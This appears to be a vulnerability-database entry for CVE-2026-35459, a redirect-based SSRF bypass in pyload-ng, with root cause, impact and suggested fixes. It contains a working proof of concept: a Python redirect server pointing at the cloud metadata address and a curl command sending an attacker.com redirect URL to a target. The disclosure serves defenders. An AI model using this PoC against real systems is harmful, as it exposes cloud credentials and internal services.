Microsoft
CVE-2026-35459
CRITICAL
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The fix for CVE-2026-33992 (GHSA-m74m-f7cr-432x) added IP validation to BaseDownloader.download() that checks the hostname of the initial download URL. However, pycurl is configured with FOLLOWLOCATION=1 and MAXREDIRS=10, causing it to automatically follow HTTP redirects. Redirect targets are never validated against the SSRF filter.
An authenticated user with ADD permission can bypass the SSRF fix by submitting a URL that redirects to an internal address.
Root Cause
The SSRF check at src/pyload/plugins/base/downloader.py:335-341 validates only the initial URL:
dl_hostname = urllib.parse.urlparse(dl_url).hostname if is_ip_address(dl_hostname) and not is_global_address(dl_hostname): self.fail(...) else: for ip in host_to_ip(dl_hostname): if not is_global_address(ip): self.fail(...)
After the check passes, _download() is called. pycurl is configured at src/pyload/core/network/http/http_request.py:114-115 to follow redirects:
self.c.setopt(pycurl.FOLLOWLOCATION, 1) self.c.setopt(pycurl.MAXREDIRS, 10)
No CURLOPT_REDIR_PROTOCOLS restriction is set anywhere in HTTPRequest. Redirect targets bypass the SSRF filter entirely.
PoC
Redirect server (attacker-controlled):
from http.server import HTTPServer, BaseHTTPRequestHandler
class RedirectHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(302) self.send_header("Location", "http://169.254.169.254/metadata/v1.json") self.end_headers()
HTTPServer(("0.0.0.0", 8888), RedirectHandler).serve_forever()
Submit to pyload (requires ADD permission):
curl -b cookies.txt -X POST 'http://target:8000/json/add_package' \ -d 'add_name=ssrf-test&add_dest=1&add_links=http://attacker.com:8888/redirect'
The SSRF check resolves attacker.com to a public IP and passes. pycurl follows the 302 redirect to http://169.254.169.254/metadata/v1.json without validation. Cloud metadata is downloaded and saved to the storage folder.
Impact
An authenticated user with ADD permission can access:
- Cloud metadata endpoints (169.254.169.254) for AWS, GCP, DigitalOcean, Azure - including IAM credentials and instance identity
- Internal network services (10.x, 172.16.x, 192.168.x)
- Localhost services (127.0.0.1)
This is the same impact as CVE-2026-33992 (rated Critical), achieved through a single redirect hop. The severity is reduced from Critical to High because authentication with ADD permission is now required.
Suggested Fix
Disable automatic redirect following and validate each redirect target:
In HTTPRequest.__init__():
self.c.setopt(pycurl.FOLLOWLOCATION, 0)
Then implement manual redirect following in the download logic with SSRF validation at each hop. Alternatively, restrict redirect protocols:
self.c.setopt(pycurl.REDIR_PROTOCOLS, pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS)
And add a pycurl callback to validate redirect destination IPs before following.
Resources
- CVE-2026-33992 / GHSA-m74m-f7cr-432x: Original SSRF (Critical, unauthenticated). This bypass requires ADD permission.
AnalysisAI
Server-Side Request Forgery (SSRF) in pyload-ng allows authenticated users with ADD permission to access internal network resources and cloud metadata endpoints by exploiting unchecked HTTP redirect handling. The vulnerability bypasses CVE-2026-33992 mitigations through redirect chains-pycurl follows up to 10 redirects automatically without validating destination IPs against the SSRF filter. Attackers can retrieve AWS/GCP/Azure instance metadata (including IAM credentials) and probe internal services. While exploitation requires authentication (reducing severity from the Critical unauthenticated CVE-2026-33992), a public proof-of-concept demonstrates the attack and no vendor-released patch has been identified at time of analysis.
Technical ContextAI
pyload-ng is a Python-based download manager (pkg:pip/pyload-ng) that uses pycurl for HTTP operations. The vulnerability stems from incomplete SSRF protection in BaseDownloader.download() at src/pyload/plugins/base/downloader.py. While the fix for CVE-2026-33992 added IP validation using is_global_address() checks against the initial URL hostname, the underlying HTTPRequest class configures pycurl with FOLLOWLOCATION=1 and MAXREDIRS=10 without setting CURLOPT_REDIR_PROTOCOLS restrictions or implementing redirect target validation. This creates a classic time-of-check-time-of-use (TOCTOU) vulnerability where the security check occurs before redirect resolution. CWE-918 (Server-Side Request Forgery) applies because the application makes HTTP requests to attacker-controlled destinations without proper validation of the final target after following redirect chains.
RemediationAI
No vendor-released patch identified at time of analysis. The vendor advisory at https://github.com/pyload/pyload/security/advisories/GHSA-7gvf-3w72-p2pg should be monitored for official fixes. The vulnerability report suggests two remediation approaches: disable automatic redirect following by setting pycurl.FOLLOWLOCATION to 0 in HTTPRequest.__init__() and implementing manual redirect validation with SSRF checks at each hop, or alternatively restrict redirect protocols using pycurl.REDIR_PROTOCOLS with only HTTP/HTTPS allowed and add a pycurl callback to validate redirect destination IPs before following. As interim mitigation, restrict ADD permission to only highly trusted users, implement network-level egress filtering to block access to cloud metadata endpoints (169.254.169.254/32) and RFC1918 private address spaces from the pyload-ng process, and monitor outbound connections for suspicious internal network access patterns. Organizations should treat this as a bypass of existing SSRF protections and prioritize patching when available.
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-7gvf-3w72-p2pg